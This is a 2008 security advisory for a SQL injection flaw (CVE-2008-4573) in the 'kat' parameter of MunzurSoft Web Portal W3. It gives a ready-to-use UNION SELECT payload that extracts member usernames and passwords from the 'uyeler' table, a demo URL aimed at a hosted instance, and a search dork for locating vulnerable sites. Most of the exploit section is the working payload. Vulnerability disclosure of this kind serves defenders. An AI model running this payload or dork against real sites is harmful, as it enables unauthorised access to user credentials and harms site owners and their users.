Topic : | MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability
|
SecurityAlert : 4420
CVE : CVE-2008-4573
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : LUPUS
Published : 18.10.2008
Affected Software : | aspindir:munzursoft_web_portal_w3 |
 Advisory Content : Author : LUPUS
Home : www.megaturks.net / www.biyosecurity.com
E-Mail : By[nokta]lupus @gmail.com
----------------------------------------------------------------
Down : http://www.aspindir.com/indir.asp?ID=5636
----------------------------------
Dork : "MunzurSoft Wep Portal W3"
------------------------------------
Demo :
http://www.munzursoft.somee.com/www/kategori.asp?kat=2%20union+select+all+0
,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
--------------------------------------
Exploit
union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
---------------------------------------------
Greetz : ENO7 - Liz0zim - Kerem125 - Prens - SaO - The_BekiR - h4ckinger -
ZeberuS
---------------------------------------
Note: �nemli Olan İnsan Olmaktır.
References :
http://securityreason.com/expldownload/1/4895/1 (Exploit)
http://www.securityfocus.com/bid/31713
http://www.milw0rm.com/exploits/6725
http://secunia.com/advisories/32238
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|